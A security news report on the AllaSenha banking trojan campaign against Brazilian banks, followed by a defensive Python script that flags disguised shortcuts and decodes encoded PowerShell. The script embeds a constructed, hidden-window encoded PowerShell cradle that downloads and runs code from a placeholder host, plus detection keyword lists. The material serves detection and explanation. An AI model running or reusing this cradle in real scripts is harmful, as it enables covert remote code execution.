A campaign targeting Brazilian banking institutions has emerged, deploying a custom variant of the AllaKore remote access trojan (RAT) known as AllaSenha. French cybersecurity firm HarfangLab identified this malware specifically designed to pilfer credentials required for Brazilian bank accounts. Major banks such as Banco do Brasil, Bradesco, and Itaú Unibanco are among the targets, with phishing links suspected as the initial access vector.
The attack begins with a deceptive Windows shortcut file masquerading as a PDF document, leading to the execution of a BAT payload. This payload, named “c.cmd,” fetches a Base64-encoded PowerShell command that retrieves a Python binary to execute the BPyCode downloader. BPyCode then downloads and runs a dynamic-link library (DLL) from domains generated via a domain generation algorithm (DGA).
The DLL, dubbed “executor.dll,” initiates the deployment of AllaSenha, a banking trojan that steals online banking credentials and intercepts two-factor authentication codes by displaying fake bank prompts to the victim. The campaign’s sophistication is underscored by its abuse of legitimate services such as Autodesk A360 Drive and GitHub to host intermediate payloads, which lets the download stages blend in with ordinary HTTPS traffic to trusted domains.
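The early stages of the chain above (a shortcut posing as a PDF, then a batch file launching Base64-encoded PowerShell that pulls the next stage) are the parts a defender can check for cheaply. The following Python triage script is an added example written for this page; it is not HarfangLab's tooling or the actual "c.cmd" content. The batch sample, the encoded command and the `example.invalid` URL are constructed here for illustration.

```python
import base64
import re

# Constructed sample resembling the "c.cmd" stage: a batch file that runs an
# encoded PowerShell download cradle. This is an illustrative stand-in, not the
# real dropper, and the URL is a hypothetical placeholder.
SAMPLE_INNER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
SAMPLE_CMD = (
    "@echo off\r\n"
    "powershell.exe -NoP -W Hidden -EncodedCommand "
    + base64.b64encode(SAMPLE_INNER.encode("utf-16le")).decode()
    + "\r\n"
)

# powershell[.exe] <any flags> -e|-ec|-enc|-EncodedCommand <base64>
# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the
# common ones seen in droppers.
ENC_RE = re.compile(
    r"powershell(?:\.exe)?\s+(?:\S+\s+)*?-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)",
    re.I,
)

# Substrings typical of a download-and-execute cradle or of an interpreter
# being fetched to run a second-stage script.
CRADLE_INDICATORS = (
    "downloadstring",
    "downloadfile",
    "invoke-webrequest",
    "iex",
    "invoke-expression",
    "python",
)


def decode_encoded_powershell(text):
    """Return the decoded payload of every -EncodedCommand found in text.

    -EncodedCommand is Base64 over UTF-16LE, which is why a plain ASCII decode
    of the blob shows interleaved NUL bytes.
    """
    decoded = []
    for match in ENC_RE.finditer(text):
        try:
            raw = base64.b64decode(match.group(1), validate=True)
            decoded.append(raw.decode("utf-16le"))
        except (ValueError, UnicodeDecodeError):
            # Not valid Base64/UTF-16LE: skip rather than crash the triage.
            continue
    return decoded


def cradle_indicators(decoded_command):
    """Return which download-cradle indicators appear in a decoded command."""
    lowered = decoded_command.lower()
    return [k for k in CRADLE_INDICATORS if k in lowered]


def is_disguised_shortcut(filename):
    """True for names such as 'Fatura.pdf.lnk' that mimic a document."""
    return re.search(r"\.(?:pdf|docx?|xlsx?)\.lnk$", filename.lower()) is not None


def triage(filename, content):
    """Combine the checks into a list of human-readable findings."""
    findings = []
    if is_disguised_shortcut(filename):
        findings.append("shortcut disguised as document: " + filename)
    for command in decode_encoded_powershell(content):
        hits = cradle_indicators(command)
        if hits:
            findings.append("encoded PowerShell download cradle: " + ", ".join(hits))
    return findings


if __name__ == "__main__":
    for line in triage("Fatura.pdf.lnk", SAMPLE_CMD):
        print(line)
```

The regex deliberately tolerates arbitrary flags between `powershell` and the encoded-command switch, because droppers routinely add `-NoP`, `-W Hidden` or `-ExecutionPolicy Bypass`; an attacker can still evade this by invoking PowerShell indirectly, so treat it as a cheap first filter rather than a complete detection.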
These findings highlight the growing threat of cybercrime campaigns targeting financial institutions, particularly in Latin America. As such attacks continue to evolve, cybersecurity researchers emphasize the need for enhanced vigilance and proactive security measures to mitigate the risks posed by sophisticated malware like AllaSenha.